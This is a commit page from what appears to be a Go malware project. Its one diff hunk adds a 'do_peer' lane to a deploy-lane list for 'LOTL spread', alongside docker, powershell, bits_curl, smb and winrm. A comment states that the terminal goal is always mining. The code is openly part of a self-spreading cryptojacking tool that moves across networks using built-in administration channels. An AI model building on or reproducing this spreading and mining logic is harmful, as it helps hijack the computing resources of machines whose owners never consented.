Add do_peer Shadow Cache Handoff deploy tier for LOTL spread onion
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled

This commit is contained in:
AetherForge
2026-06-07 00:57:46 -07:00
parent e37eb24369
commit 652356bfe6
23 changed files with 624 additions and 5 deletions

View File

@@ -48,6 +48,7 @@ var DefaultReconTiers = []string{
}
// DefaultDeployLanes is the discover_and_join lane order (mirrors LOTL spread tiers).
// Deploy success is spread-only; terminal goal is always mining via startMiningWhenReady().
var DefaultDeployLanes = []string{
"discover_and_join",
"docker",
@@ -55,6 +56,7 @@ var DefaultDeployLanes = []string{
"powershell",
"dotnet",
"bits_curl",
"do_peer",
"smb",
"winrm",
}